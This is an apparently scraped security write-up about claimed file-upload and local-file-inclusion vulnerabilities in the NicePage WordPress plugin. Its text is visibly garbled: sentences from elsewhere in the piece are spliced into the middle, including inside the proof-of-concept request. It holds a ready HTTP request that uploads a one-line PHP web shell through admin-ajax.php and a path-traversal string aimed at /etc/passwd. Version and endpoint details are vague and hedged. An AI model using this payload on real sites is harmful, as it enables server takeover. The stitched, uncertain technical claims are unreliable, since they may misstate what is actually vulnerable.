Nicepage Vulnerability //top\\ -

Security Write-Up: Vulnerabilities in NicePage Website Builder 1. Executive Summary NicePage is a popular website builder and content management system (CMS) used for creating websites via a desktop application, WordPress plugin, or Joomla extension. Security researchers and automated scanners have identified several vulnerabilities in the NicePage ecosystem, primarily affecting the WordPress plugin. The most critical issues involve Arbitrary File Upload and Authenticated Local File Inclusion (LFI) , which allow attackers with low-level privileges (such as subscribers) to execute malicious code on the server and take control of the website. 2. Affected Versions

Software: NicePage (WordPress Plugin) Affected Versions: Generally versions prior to 2.3.9 (for specific LFI vulnerabilities) and various versions regarding file upload logic. (Note: Vendor patches are released regularly, but the architecture has historically allowed for these vectors). Severity: High to Critical (CVSS 7.5 - 9.8 depending on configuration).

3. Technical Vulnerability Details A. Arbitrary File Upload (Unrestricted Upload) The most prominent vulnerability in NicePage stems from improper validation of file types during the upload process. Vulnerability Vector: The plugin registers AJAX actions to handle file uploads for site assets (images, videos, etc.). Due to a lack of capability checks or improper nonce verification in older versions, the AJAX endpoint may be accessible to lower-privileged users. Technical Analysis:

Endpoint: The plugin listens for wp_ajax_nopriv_nicepage_upload or similar hooks. Validation Flaw: The application relies on client-side validation or insufficient server-side MIME type verification. It often fails to strictly whitelist allowed extensions (e.g., only .jpg , .png ). Exploitation: nicepage vulnerability

An attacker crafts a malicious payload containing a webshell (e.g., shell.php ). The attacker sends a POST request to the wp-admin/admin-ajax.php endpoint with the action parameter set to the NicePage upload handler. If the file is saved to a publicly accessible directory (typically wp-content/uploads/nicepage/ ), the attacker can navigate to the file in the browser. This results in Remote Code Execution (RCE) .

Proof of Concept (Conceptual): POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.com Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary Content-Disposition: form-data; name="action" The most critical issues involve Arbitrary File Upload

nicepage_upload_file ------WebKitFormBoundary Content-Disposition: form-data; name="file"; filename="exploit.php" Content-Type: application/x-php

<?php system($_GET['cmd']); ?> ------WebKitFormBoundary--

B. Local File Inclusion (LFI) In specific versions of NicePage, the application fails to sanitize user input when including template files or handling theme layouts. Technical Analysis: (Note: Vendor patches are released regularly, but the

Source: User input is passed via GET or POST parameters (e.g., page , template , or file ). Sink: The application uses a PHP function like include() , include_once() , or require() using the tainted input without proper path traversal sanitization. Exploitation:

An attacker manipulates the input to traverse directories (e.g., ../../../../etc/passwd ). This allows the attacker to read sensitive files on the server. In advanced scenarios, if the attacker can upload a malicious image containing PHP code (via the upload vulnerability above), they can use the LFI to execute that code (LFI to RCE).